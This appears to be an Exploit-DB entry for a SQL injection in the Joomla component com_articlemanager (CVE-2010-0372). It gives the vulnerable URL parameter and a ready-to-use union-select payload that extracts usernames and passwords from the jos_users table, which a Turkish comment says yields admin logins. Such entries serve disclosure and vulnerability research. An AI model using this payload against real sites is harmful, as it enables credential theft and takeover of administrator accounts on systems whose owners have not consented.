Joomla! Component com_articlemanager - SQL Injection
Author: FL0RiX
type: webapps
platform: php
port:
date_added: 2010-01-13
date_updated:
verified: 1
codes: OSVDB-61898;CVE-2010-0372
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.com090327.com_articlemanager.zip
########################################################################
# Joomla Component com_articlemanager SQL Injection Vulnerability
########################################################################
# Author :FL0RiX
#
# Name : com_articlemanager
#
# Bug Type : SQL Injection
#
# Infection : Admin login bilgileri alinabilir.
#
# Demo Vuln :
#
# http://[server]/index.php?option=com_articlemanager&Itemid=349&task=display&artid=
#
#EXPLOIT : null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rix,5,6,7,8/**/from/**/jos_users--
########################################################################